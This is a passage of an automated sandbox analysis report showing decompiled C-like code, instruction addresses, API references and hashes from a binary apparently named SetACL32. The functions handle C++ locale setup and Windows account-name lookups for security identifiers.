									_t324 =  &(_t324[2]);
									goto L24;
								} else {
									_t258 =  *(_t265 - 4);
									_t283 = _t308 + 0x23;
									__eflags = _t240 - _t258 + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										E012CF35F(_t247, _t258, _t283, __eflags);
										L80:
										E012CF35F(_t247, _t258, _t283, __eflags);
										L81:
										E012CF35F(_t247, _t258, _t283, __eflags);
										L82:
										E012CF35F(_t247, _t258, _t283, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t313);
										_t315 = _t258;
										_t172 =  *_t315;
										__eflags = _t172;
										if(_t172 == 0) {
											L87:
											return _t172;
										} else {
											_t261 = _t315[2] - _t172 & 0xfffffffe;
											__eflags = _t261 - 0x1000;
											if(_t261 < 0x1000) {
												L86:
												_push(_t261);
												_t172 = E012CAE27(_t172);
												 *_t315 = 0;
												_t315[1] = 0;
												_t315[2] = 0;
												goto L87;
											} else {
												_t284 =  *(_t172 - 4);
												_t261 = _t261 + 0x23;
												__eflags = _t172 - _t284 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													E012CF35F(_t247, _t261, _t284, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													__eflags =  *((intOrPtr*)(_t261 + 0x14)) - 8;
													_t176 = _t261;
													if( *((intOrPtr*)(_t261 + 0x14)) >= 8) {
														_t176 =  *_t261;
													}
													 *(_t261 + 0x10) = 0;
													__eflags = 0;
													 *_t176 = 0;
													return _t176;
												} else {
													_t172 = _t284;
													goto L86;
												}
											}
										}
									} else {
										goto L23;
									}
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}











































































              0x012a2ee0
              0x012a2ee0
              0x012a2ee1
              0x012a2ee3
              0x012a2ee5
              0x012a2ef0
              0x012a2ef1
              0x012a2ef4
              0x012a2ef9
              0x012a2efb
              0x012a2efe
              0x012a2eff
              0x012a2f00
              0x012a2f01
              0x012a2f05
              0x012a2f0b
              0x012a2f0d
              0x012a2f10
              0x012a2f12
              0x012a2f15
              0x012a2f1c
              0x012a2f22
              0x012a2f26
              0x012a2f28
              0x012a2f28
              0x012a2f2c
              0x012a2f33
              0x012a2f36
              0x012a2f3b
              0x012a3100
              0x012a3100
              0x012a3100
              0x00000000
              0x012a2f58
              0x012a2f5f
              0x012a2f68
              0x012a2f73
              0x012a2f76
              0x012a2f78
              0x012a2f7b
              0x012a2f82
              0x012a2f89
              0x012a2f8f
              0x012a2f94
              0x012a2fa0
              0x012a2fa8
              0x012a2fab
              0x012a2fb0
              0x012a2fb3
              0x012a2fb6
              0x012a2fb9
              0x012a2fbf
              0x012a2fc2
              0x012a2fc5
              0x012a2fc5
              0x012a2fcb
              0x012a2fd1
              0x00000000
              0x00000000
              0x012a2fd5
              0x012a2fd8
              0x012a2fda
              0x012a2fdf
              0x012a2fe5
              0x012a2ff6
              0x012a2ff6
              0x00000000
              0x012a2fe7
              0x012a2fec
              0x012a2fef
              0x012a2ff4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a2ff4
              0x012a2fe7
              0x012a2ff8
              0x012a2ff8
              0x012a2ff8
              0x012a2ffd
              0x012a3001
              0x012a3006
              0x012a3008
              0x012a300b
              0x00000000
              0x012a300b
              0x012a3006
              0x00000000
              0x012a2ffd
              0x012a300e
              0x012a3011
              0x012a3014
              0x012a3378
              0x012a337b
              0x012a3382
              0x012a3382
              0x00000000
              0x012a337d
              0x012a337d
              0x012a3380
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a3380
              0x012a301a
              0x012a301a
              0x012a301b
              0x012a3023
              0x012a3028
              0x012a302b
              0x012a3034
              0x012a3040
              0x012a3044
              0x012a304a
              0x012a3051
              0x012a3055
              0x012a305a
              0x012a305f
              0x012a3066
              0x012a306e
              0x012a3072
              0x012a3078
              0x012a307b
              0x012a3080
              0x012a3084
              0x012a3087
              0x012a308a
              0x012a308c
              0x012a308f
              0x012a30c3
              0x012a30c5
              0x012a30cc
              0x012a30d3
              0x012a30d7
              0x012a30da
              0x012a30dc
              0x012a30e0
              0x012a30e2
              0x012a30e5
              0x012a30e7
              0x012a30ef
              0x012a30f1
              0x012a30f1
              0x012a30e7
              0x012a30f3
              0x012a30f5
              0x012a313f
              0x012a3141
              0x012a314a
              0x012a314f
              0x012a3152
              0x012a315b
              0x012a3167
              0x012a316b
              0x012a3171
              0x012a3178
              0x012a317c
              0x012a3181
              0x012a3186
              0x012a318d
              0x012a3195
              0x012a3199
              0x012a319f
              0x012a31a2
              0x012a31a7
              0x012a31ab
              0x012a31ae
              0x012a31b1
              0x012a31b3
              0x012a31b6
              0x012a31ea
              0x012a31ec
              0x012a31f3
              0x012a31fa
              0x012a31fe
              0x012a3201
              0x012a3203
              0x012a3207
              0x012a3209
              0x012a320c
              0x012a320e
              0x012a3216
              0x012a3218
              0x012a3218
              0x012a320e
              0x012a321a
              0x012a321c
              0x012a322f
              0x012a3231
              0x012a323a
              0x012a323f
              0x012a3242
              0x012a324b
              0x012a3257
              0x012a325b
              0x012a3261
              0x012a3268
              0x012a326c
              0x012a3271
              0x012a3276
              0x012a327d
              0x012a3285
              0x012a3289
              0x012a328f
              0x012a3292
              0x012a3297
              0x012a329b
              0x012a329e
              0x012a32a1
              0x012a32a3
              0x012a32a6
              0x012a32da
              0x012a32dc
              0x012a32e3
              0x012a32ea
              0x012a32ee
              0x012a32f1
              0x012a32f3
              0x012a32f7
              0x012a32f9
              0x012a32fc
              0x012a32fe
              0x012a3302
              0x012a3306
              0x012a3306
              0x012a32fe
              0x012a3308
              0x012a330a
              0x012a3353
              0x012a335a
              0x012a335e
              0x012a3363
              0x012a3373
              0x00000000
              0x012a3365
              0x012a3365
              0x012a3368
              0x00000000
              0x012a336e
              0x012a336e
              0x00000000
              0x012a336e
              0x012a3368
              0x012a330c
              0x012a330c
              0x012a330f
              0x012a330f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a330f
              0x012a32a8
              0x012a32a8
              0x012a32ab
              0x012a32b2
              0x012a32b4
              0x012a32ba
              0x012a32d0
              0x012a32d0
              0x012a32d2
              0x012a32d7
              0x00000000
              0x012a32bc
              0x012a32bc
              0x012a32bf
              0x012a32c7
              0x012a32ca
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a32ca
              0x012a32ba
              0x012a321e
              0x012a321e
              0x012a3221
              0x00000000
              0x012a3227
              0x012a3227
              0x00000000
              0x012a3227
              0x012a3221
              0x012a31b8
              0x012a31b8
              0x012a31bb
              0x012a31c2
              0x012a31c4
              0x012a31ca
              0x012a31e0
              0x012a31e0
              0x012a31e2
              0x012a31e7
              0x00000000
              0x012a31cc
              0x012a31cc
              0x012a31cf
              0x012a31d7
              0x012a31da
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a31da
              0x012a31ca
              0x012a30f7
              0x012a30f7
              0x012a30fa
              0x012a30fa
              0x012a3315
              0x012a3315
              0x012a3318
              0x012a3318
              0x012a331f
              0x012a3322
              0x012a3326
              0x012a3328
              0x012a338a
              0x012a338a
              0x012a338a
              0x012a332a
              0x012a332a
              0x012a332d
              0x012a332d
              0x012a3330
              0x012a3332
              0x012a3335
              0x012a333a
              0x012a333d
              0x012a334d
              0x012a334f
              0x012a3340
              0x012a3340
              0x012a3340
              0x012a3342
              0x00000000
              0x00000000
              0x012a3344
              0x012a3347
              0x012a334b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a334b
              0x00000000
              0x012a3340
              0x012a333d
              0x012a338d
              0x012a338d
              0x012a338f
              0x012a3399
              0x012a33a0
              0x012a33a3
              0x012a33aa
              0x012a33af
              0x012a33b7
              0x012a33bc
              0x012a33c5
              0x012a33ca
              0x012a33cd
              0x012a33d0
              0x012a3400
              0x012a3400
              0x012a3402
              0x012a3404
              0x012a340d
              0x012a340d
              0x012a3412
              0x012a3102
              0x012a3102
              0x012a3105
              0x012a3108
              0x012a3423
              0x012a3428
              0x012a3430
              0x012a3431
              0x012a3432
              0x012a3436
              0x012a3440
              0x012a310e
              0x012a310e
              0x012a3111
              0x012a3118
              0x012a311a
              0x012a3120
              0x012a3419
              0x012a3419
              0x012a341b
              0x00000000
              0x012a3126
              0x012a3126
              0x012a3129
              0x012a3131
              0x012a3134
              0x00000000
              0x012a313a
              0x00000000
              0x012a313a
              0x012a3134
              0x012a3120
              0x012a33d2
              0x012a33d2
              0x012a33d5
              0x012a33dc
              0x012a33de
              0x012a33e4
              0x012a33f6
              0x012a33f6
              0x012a33f8
              0x012a33fd
              0x00000000
              0x012a33e6
              0x012a33e6
              0x012a33e9
              0x012a33f1
              0x012a33f4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a33f4
              0x012a33e4
              0x00000000
              0x00000000
              0x00000000
              0x012a30fa
              0x012a3091
              0x012a3091
              0x012a3094
              0x012a309b
              0x012a309d
              0x012a30a3
              0x012a30b9
              0x012a30b9
              0x012a30bb
              0x012a30c0
              0x00000000
              0x012a30a5
              0x012a30a5
              0x012a30a8
              0x012a30b0
              0x012a30b3
              0x012a3441
              0x012a3446
              0x012a3446
              0x012a344b
              0x012a344b
              0x012a3450
              0x012a3450
              0x012a3455
              0x012a3456
              0x012a3457
              0x012a3458
              0x012a3459
              0x012a345a
              0x012a345b
              0x012a345c
              0x012a345d
              0x012a345e
              0x012a345f
              0x012a3460
              0x012a3461
              0x012a3463
              0x012a3465
              0x012a3467
              0x012a34a9
              0x012a34aa
              0x012a3469
              0x012a346e
              0x012a3471
              0x012a3477
              0x012a348b
              0x012a348b
              0x012a348d
              0x012a3492
              0x012a349b
              0x012a34a2
              0x00000000
              0x012a3479
              0x012a3479
              0x012a347c
              0x012a3484
              0x012a3487
              0x012a34ab
              0x012a34b0
              0x012a34b1
              0x012a34b2
              0x012a34b3
              0x012a34b4
              0x012a34b5
              0x012a34b6
              0x012a34b7
              0x012a34b8
              0x012a34b9
              0x012a34ba
              0x012a34bb
              0x012a34bc
              0x012a34bd
              0x012a34be
              0x012a34bf
              0x012a34c0
              0x012a34c4
              0x012a34c6
              0x012a34c8
              0x012a34c8
              0x012a34ca
              0x012a34d1
              0x012a34d3
              0x012a34d6
              0x012a3489
              0x012a3489
              0x00000000
              0x012a3489
              0x012a3487
              0x012a3477
              0x00000000
              0x00000000
              0x00000000
              0x012a30b3
              0x012a30a3
              0x012a308f
              0x00000000
              0x00000000
              0x00000000
              0x012a2f68

              APIs
              • std::locale::_Init.LIBCPMT ref: 012A301E
              • std::locale::_Init.LIBCPMT ref: 012A3145
              • std::locale::_Init.LIBCPMT ref: 012A3235
                • Part of subcall function 012C9DCB: __EH_prolog3.LIBCMT ref: 012C9DD2
                • Part of subcall function 012C9DCB: std::_Lockit::_Lockit.LIBCPMT ref: 012C9DDD
                • Part of subcall function 012C9DCB: std::locale::_Setgloballocale.LIBCPMT ref: 012C9DF8
                • Part of subcall function 012C9DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 012C9E4E
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
              • String ID: \\?\$\\?\UNC\
              • API String ID: 1949052339-3019864461
              • Opcode ID: 3d44194c9d45ec1e03306ad94d942571c05386dec553fe66e31a5c718c5fe5c2
              • Instruction ID: 336ccfbe697c1c556be0c9c56b717d965c1eb64656a7940c042959910a9c43b6
              • Opcode Fuzzy Hash: 3d44194c9d45ec1e03306ad94d942571c05386dec553fe66e31a5c718c5fe5c2
              • Instruction Fuzzy Hash: 0B02E131A2024ADFDF14CF68C884BAEBFB5BF55314F58812CE605AB290D7759A84CBD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0129B170 Relevance: 9.1, APIs: 6, Instructions: 130COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E0129B170(void* __fp0) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v32;
				intOrPtr* _v36;
				char _v40;
				char _v60;
				char _v108;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t40;
				intOrPtr* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t55;
				void* _t60;
				signed int _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t82;
				intOrPtr* _t85;
				void* _t91;
				void* _t103;
				void* _t111;

				_t111 = __fp0;
				_t67 = _t91;
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_push(0xffffffff);
				_push(0x12e8ec4);
				_push( *[fs:0x0]);
				_push(_t67);
				_t40 =  *0x1309018; // 0xedd8d3b4
				_push(_t40 ^ (_t91 - 0x00000008 & 0xfffffff8) + 0x00000004);
				 *[fs:0x0] =  &_v24;
				E012CA2B4( &_v40, 0);
				_v16 = 0;
				_t82 =  *0x130a764; // 0x1
				_t44 =  *0x130b644; // 0x1132ad8
				_v36 = _t44;
				if(_t82 == 0) {
					E012CA2B4( &_v32, _t82);
					_t103 =  *0x130a764 - _t82; // 0x1
					if(_t103 == 0) {
						_t65 =  *0x130a750; // 0x1
						_t66 = _t65 + 1;
						 *0x130a750 = _t66;
						 *0x130a764 = _t66;
					}
					E012CA30C( &_v32);
					_t82 =  *0x130a764; // 0x1
				}
				_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 8)) + 4));
				if(_t82 >=  *((intOrPtr*)(_t70 + 0xc))) {
					_t85 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t70 + 0x14)) == 0) {
						L11:
						if(_t85 != 0) {
							L19:
							E012CA30C( &_v40);
							 *[fs:0x0] = _v24;
							return _t85;
						}
						L12:
						_t47 = _v36;
						if(_t47 == 0) {
							_push(0x44);
							_t85 = E012CAE5D(_t67, _t82, _t85, __eflags);
							_v36 = _t85;
							_v16 = 1;
							_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 8)) + 4));
							__eflags = _t74;
							if(_t74 == 0) {
								_t50 = 0x12fbc24;
							} else {
								_t50 =  *((intOrPtr*)(_t74 + 0x18));
								__eflags = _t50;
								if(_t50 == 0) {
									_t50 = _t74 + 0x1c;
								}
							}
							E012A1550( &_v160, _t50);
							 *((intOrPtr*)(_t85 + 4)) = 0;
							 *_t85 = 0x12ef13c;
							E012CA3FA(_t82, _t85, __eflags, _t111,  &_v60);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							_t55 = E012CA32B(__eflags,  &_v108);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x18], xmm0");
							asm("movups xmm0, [eax+0x10]");
							asm("movups [esi+0x28], xmm0");
							asm("movq xmm0, [eax+0x20]");
							asm("movq [esi+0x38], xmm0");
							 *((intOrPtr*)(_t85 + 0x40)) =  *((intOrPtr*)(_t55 + 0x28));
							E012A1620( &_v160);
							_v36 = _t85;
							_v16 = 2;
							E012C9D99(__eflags, _t85);
							 *((intOrPtr*)( *_t85 + 4))();
							 *0x130b644 = _t85;
						} else {
							_t85 = _t47;
						}
						goto L19;
					}
					_t60 = E012C9DC5();
					if(_t82 >=  *((intOrPtr*)(_t60 + 0xc))) {
						goto L12;
					}
					_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)) + _t82 * 4));
					goto L11;
				}
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 8)) + _t82 * 4));
				if(_t85 != 0) {
					goto L19;
				}
				goto L8;
			}
































              0x0129b170
              0x0129b171
              0x0129b180
              0x0129b186
              0x0129b188
              0x0129b193
              0x0129b194
              0x0129b19d
              0x0129b1a4
              0x0129b1a8
              0x0129b1b3
              0x0129b1b8
              0x0129b1bf
              0x0129b1c5
              0x0129b1ca
              0x0129b1cf
              0x0129b1d5
              0x0129b1da
              0x0129b1e0
              0x0129b1e2
              0x0129b1e7
              0x0129b1e8
              0x0129b1ed
              0x0129b1ed
              0x0129b1f5
              0x0129b1fa
              0x0129b1fa
              0x0129b203
              0x0129b209
              0x0129b21b
              0x0129b21b
              0x0129b21d
              0x0129b221
              0x0129b233
              0x0129b235
              0x0129b2f6
              0x0129b2f9
              0x0129b303
              0x0129b313
              0x0129b313
              0x0129b23b
              0x0129b23b
              0x0129b240
              0x0129b249
              0x0129b250
              0x0129b255
              0x0129b25b
              0x0129b25f
              0x0129b262
              0x0129b264
              0x0129b272
              0x0129b266
              0x0129b266
              0x0129b269
              0x0129b26b
              0x0129b26d
              0x0129b26d
              0x0129b26b
              0x0129b27e
              0x0129b286
              0x0129b28e
              0x0129b294
              0x0129b29c
              0x0129b2a3
              0x0129b2a7
              0x0129b2b5
              0x0129b2b8
              0x0129b2bc
              0x0129b2c0
              0x0129b2c4
              0x0129b2c9
              0x0129b2d1
              0x0129b2d4
              0x0129b2d9
              0x0129b2dd
              0x0129b2e1
              0x0129b2ed
              0x0129b2f0
              0x0129b242
              0x0129b242
              0x0129b242
              0x00000000
              0x0129b240
              0x0129b223
              0x0129b22b
              0x00000000
              0x00000000
              0x0129b230
              0x00000000
              0x0129b230
              0x0129b20e
              0x0129b213
              0x00000000
              0x00000000
              0x00000000

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 0129B1B3
              • std::_Lockit::_Lockit.LIBCPMT ref: 0129B1D5
              • std::_Lockit::~_Lockit.LIBCPMT ref: 0129B1F5
              • __Getctype.LIBCPMT ref: 0129B294
              • std::_Facet_Register.LIBCPMT ref: 0129B2E1
              • std::_Lockit::~_Lockit.LIBCPMT ref: 0129B2F9
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
              • String ID:
              • API String ID: 1102183713-0
              • Opcode ID: ccbd2e72a1432c9602da8b8184ac49bb41a919f8d4f41a40d01b26f8ecbf0fc7
              • Instruction ID: 39db706244a122e4fce0f74f1296ed58c760542a1a29e559ef36782035f39a86
              • Opcode Fuzzy Hash: ccbd2e72a1432c9602da8b8184ac49bb41a919f8d4f41a40d01b26f8ecbf0fc7
              • Instruction Fuzzy Hash: C551C071D1071ACFDB22DF58E981B6AB7F4FB14B10F1482ADD94A97252EB30B941CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C9020 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 285COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E012C9020(WCHAR* __ecx, void** __edx, intOrPtr _a4, void* _a8, union _SID_NAME_USE* _a12, WCHAR* _a16) {
				WCHAR* _v8;
				union _SID_NAME_USE _v12;
				char _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v44;
				char _v68;
				long _v72;
				void** _v76;
				union _SID_NAME_USE* _v80;
				long _v84;
				long _v88;
				void* _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				WCHAR* _v104;
				WCHAR* _v108;
				WCHAR* _v112;
				intOrPtr _v116;
				WCHAR* _v120;
				WCHAR* _v124;
				WCHAR* _v128;
				WCHAR* _v132;
				char _v136;
				WCHAR* _v164;
				char _v172;
				WCHAR* _v176;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				WCHAR* _t143;
				WCHAR* _t144;
				WCHAR* _t145;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t149;
				WCHAR* _t151;
				long _t153;
				WCHAR* _t155;
				signed int _t161;
				WCHAR* _t166;
				WCHAR* _t170;
				WCHAR* _t173;
				WCHAR* _t176;
				WCHAR* _t179;
				WCHAR* _t182;
				WCHAR* _t187;
				WCHAR* _t189;
				WCHAR* _t191;
				WCHAR* _t193;
				WCHAR* _t195;
				WCHAR* _t197;
				WCHAR* _t199;
				WCHAR* _t213;
				short* _t221;
				short* _t222;
				WCHAR* _t226;
				void* _t228;
				WCHAR* _t229;
				WCHAR* _t231;
				WCHAR* _t232;
				WCHAR* _t233;
				WCHAR* _t234;
				WCHAR* _t235;
				WCHAR* _t236;
				union _SID_NAME_USE* _t239;
				void* _t242;
				WCHAR* _t243;
				WCHAR* _t247;
				WCHAR* _t294;
				short _t298;
				short* _t303;
				WCHAR* _t325;
				void* _t327;
				signed int _t329;
				void** _t334;
				void* _t336;
				WCHAR* _t337;
				WCHAR* _t339;
				WCHAR* _t340;
				WCHAR* _t341;
				WCHAR* _t342;
				WCHAR* _t343;
				WCHAR* _t344;
				void* _t346;
				WCHAR* _t347;
				WCHAR* _t348;
				signed int _t349;
				void* _t351;
				signed int _t352;

				_t300 = __edx;
				_push(0xffffffff);
				_push(0x12ecd65);
				_push( *[fs:0x0]);
				_t352 = _t351 - 0x7c;
				_t138 =  *0x1309018; // 0xedd8d3b4
				_t139 = _t138 ^ _t349;
				_v20 = _t139;
				_push(_t139);
				 *[fs:0x0] =  &_v16;
				_t334 = __edx;
				_v76 = __edx;
				_t226 = __ecx;
				_v128 = __ecx;
				_t239 = _a12;
				_t325 = _a16;
				_v96 = _a4;
				_v72 = _t325;
				_v92 = _a8;
				_v80 = _t239;
				_v88 = 0;
				_v84 = 0;
				if(_t239 != 0) {
					 *_t239 = 8;
					__eflags = _t325;
					if(_t325 == 0) {
						L15:
						__eflags = _t226[8];
						if(_t226[8] != 0) {
							__eflags = _t226[0xa] - 8;
							_t143 = _t226;
							if(_t226[0xa] >= 8) {
								_t143 =  *_t226;
							}
						} else {
							_t143 = 0;
						}
						_t144 = LookupAccountSidW(_t143,  *_t334, 0,  &_v88, 0,  &_v84, _t239);
						__eflags = _t144;
						if(_t144 != 0) {
							L22:
							_t335 = _v88;
							_t227 = 0;
							_t326 = 0;
							_v124 = 0;
							_v120 = 0;
							_v116 = 0;
							__eflags = _t335;
							if(_t335 == 0) {
								L25:
								_v8 = 0;
								_t335 = 0;
								_t145 = _v84;
								_v132 = _t145;
								_v112 = 0;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L28:
									_v8 = 1;
									_t242 =  *_v76;
									_t147 = _v128;
									__eflags = _t147[8];
									if(_t147[8] != 0) {
										__eflags = _t147[0xa] - 8;
										if(_t147[0xa] >= 8) {
											_t147 =  *_t147;
										}
									} else {
										_t147 = 0;
									}
									_t302 =  &_v88;
									_t148 = LookupAccountSidW(_t147, _t242, _t227,  &_v88, _t335,  &_v84, _v80);
									__eflags = _t148;
									if(_t148 != 0) {
										_t243 = _t227;
										_t67 =  &(_t243[1]); // 0x2
										_t303 = _t67;
										do {
											_t149 =  *_t243;
											_t243 =  &(_t243[1]);
											__eflags = _t149;
										} while (_t149 != 0);
										__eflags = _t243 - _t303;
										E012A1EE0(_t227, _v96, _t303, _t326, _t335, _t227, _t243 - _t303 >> 1);
										_t247 = _t335;
										_t69 =  &(_t247[1]); // 0x2
										_t302 = _t69;
										do {
											_t151 =  *_t247;
											_t247 =  &(_t247[1]);
											__eflags = _t151;
										} while (_t151 != 0);
										_t242 = _v92;
										E012A1EE0(_t227, _t242, _t302, _t326, _t335, _t335, _t247 - _t302 >> 1);
										__eflags = _v72;
										if(_v72 != 0) {
											E012983B0( &_v68, _v92);
											_v8 = 2;
											E012983B0( &_v44, _v96);
											_v8 = 3;
											_t346 = E012C95F0(__eflags, _v76);
											E012982B0(_t227, _t346,  &_v68);
											_t82 = _t346 + 0x18; // 0x18
											E012982B0(_t227, _t82,  &_v44);
											_t242 =  &_v68;
											E012A6F20(_t227, _t242, _t346);
											_t335 = _v100;
										}
										_v72 = 0;
									} else {
										_v72 = GetLastError();
									}
									__eflags = _t335;
									if(_t335 == 0) {
										L46:
										__eflags = _t227;
										if(_t227 == 0) {
											L50:
											_t153 = _v72;
											goto L51;
										} else {
											_t155 = _t227;
											_t329 = _t326 - _t227 & 0xfffffffe;
											__eflags = _t329 - 0x1000;
											if(_t329 < 0x1000) {
												L49:
												_push(_t329);
												E012CAE27(_t227);
												goto L50;
											} else {
												_t227 =  *(_t227 - 4);
												_t329 = _t329 + 0x23;
												__eflags = _t155 - _t227 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L54;
												} else {
													goto L49;
												}
											}
										}
									} else {
										_t242 = _v104 - _t335 & 0xfffffffe;
										__eflags = _t242 - 0x1000;
										if(_t242 < 0x1000) {
											L45:
											_push(_t242);
											E012CAE27(_t335);
											_t352 = _t352 + 8;
											goto L46;
										} else {
											_t302 =  *(_t335 - 4);
											_t242 = _t242 + 0x23;
											_t335 = _t335 - _t302;
											_t88 = _t335 - 4; // -4
											__eflags = _t88 - 0x1f;
											if(__eflags > 0) {
												goto L54;
											} else {
												_t335 = _t302;
												goto L45;
											}
										}
									}
								} else {
									__eflags = _t145 - 0x7fffffff;
									if(_t145 > 0x7fffffff) {
										goto L53;
									} else {
										_push(_t145);
										_t213 = E012A1E80(_t227, _t300, _t326, 0);
										_t294 = _v132 + _v132;
										__eflags = _t294;
										_v100 = _t213;
										_t347 = _t213 + _t294;
										_v112 = _t213;
										_v104 = _t347;
										E012CCDE0(_t326, _t213, 0, _t294);
										_v108 = _t347;
										_t352 = _t352 + 0xc;
										_t335 = _v100;
										goto L28;
									}
								}
							} else {
								__eflags = _t335 - 0x7fffffff;
								if(_t335 > 0x7fffffff) {
									E0129CEE0(0, _t300, _t335);
									L53:
									E0129CEE0(_t227, _t300, _t335);
									L54:
									E012CF35F(_t227, _t242, _t302, __eflags);
									asm("int3");
									asm("int3");
									_push(_t349);
									_push(0xffffffff);
									_push(0x12ecdcd);
									_push( *[fs:0x0]);
									_push(_t227);
									_push(_t335);
									_push(_t329);
									_t161 =  *0x1309018; // 0xedd8d3b4
									_push(_t161 ^ _t352);
									 *[fs:0x0] =  &_v172;
									_t330 = _t242;
									_push(1);
									_v164 = 0;
									_t337 = E012C9DCB(_t227, _t242, _t335, __eflags);
									_v176 = _t337;
									_v164 = 1;
									_push( &_v180);
									_t166 = E01298900(_t242, L"NT AUTHORITY");
									_v164 = 0xffffffff;
									_t229 = _t166;
									__eflags = _t337;
									if(_t337 != 0) {
										_t199 =  *((intOrPtr*)( *_t337 + 8))();
										__eflags = _t199;
										if(_t199 != 0) {
											 *((intOrPtr*)( *( *_t199)))(1);
										}
									}
									__eflags = _t229;
									if(__eflags != 0) {
										L84:
										 *[fs:0x0] = _v20;
										return 1;
									} else {
										_push(1);
										_v12 = 2;
										_t339 = E012C9DCB(_t229, _t330, _t337, __eflags);
										_v24 = _t339;
										_v12 = 3;
										_push( &_v28);
										_t170 = E01298900(_t330, L"NT SERVICE");
										_v12 = 0xffffffff;
										_t231 = _t170;
										__eflags = _t339;
										if(_t339 != 0) {
											_t197 =  *((intOrPtr*)( *_t339 + 8))();
											__eflags = _t197;
											if(_t197 != 0) {
												 *((intOrPtr*)( *( *_t197)))(1);
											}
										}
										__eflags = _t231;
										if(__eflags != 0) {
											goto L84;
										} else {
											_push(1);
											_v12 = 4;
											_t340 = E012C9DCB(_t231, _t330, _t339, __eflags);
											_v24 = _t340;
											_v12 = 5;
											_t173 = E012C9610(_t330,  &_v28);
											_v12 = 0xffffffff;
											_t232 = _t173;
											__eflags = _t340;
											if(_t340 != 0) {
												_t195 =  *((intOrPtr*)( *_t340 + 8))();
												__eflags = _t195;
												if(_t195 != 0) {
													 *((intOrPtr*)( *( *_t195)))(1);
												}
											}
											__eflags = _t232;
											if(__eflags != 0) {
												goto L84;
											} else {
												_push(1);
												_v12 = 6;
												_t341 = E012C9DCB(_t232, _t330, _t340, __eflags);
												_v24 = _t341;
												_v12 = 7;
												_push( &_v28);
												_t176 = E01298900(_t330, L"NT VIRTUAL MACHINE");
												_v12 = 0xffffffff;
												_t233 = _t176;
												__eflags = _t341;
												if(_t341 != 0) {
													_t193 =  *((intOrPtr*)( *_t341 + 8))();
													__eflags = _t193;
													if(_t193 != 0) {
														 *((intOrPtr*)( *( *_t193)))(1);
													}
												}
												__eflags = _t233;
												if(__eflags != 0) {
													goto L84;
												} else {
													_push(1);
													_v12 = 8;
													_t342 = E012C9DCB(_t233, _t330, _t341, __eflags);
													_v24 = _t342;
													_v12 = 9;
													_push( &_v28);
													_t179 = E01298900(_t330, L"IIS AppPool");
													_v12 = 0xffffffff;
													_t234 = _t179;
													__eflags = _t342;
